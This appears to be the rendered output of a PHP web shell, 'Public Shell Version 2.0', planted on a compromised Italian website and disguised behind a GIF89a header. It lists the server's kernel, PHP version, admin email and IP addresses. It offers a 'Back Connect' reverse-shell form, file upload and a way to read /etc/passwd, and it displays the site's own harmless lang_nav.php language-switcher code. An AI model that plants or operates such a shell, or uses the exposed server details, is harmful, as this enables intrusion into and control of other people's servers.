GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s08.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.110 Your IP : 52.15.242.179
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/include/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/include/lang_nav.php

<script>
		$(document).ready(function(){
		     
		     
		        var urlit = window.location.href + '&lang=it';
		        	$('a[href="?lang=it"]').attr('href',urlit);
		     	
		     	var urlen = window.location.href + '&lang=en';
			     	$('a[href="?lang=en"]').attr('href',urlen);
	   
		     });
</script>

<?
if($_SESSION['lang']=='it'){echo '<a href="?lang=it" class="active lang it_hover show-option" title="Italiano"></a>';}
else{echo '<a class="lang it show-option" title="Italiano" href="?lang=it"></a>&nbsp;';} 
if($_SESSION['lang']=='en'){echo '<a href="?lang=en" class="active lang en_hover show-option" title="English"></a>&nbsp;';} 
else{echo '<a class="lang en show-option" title="English" href="?lang=en"></a>';}
?>

Public Shell Version 2.0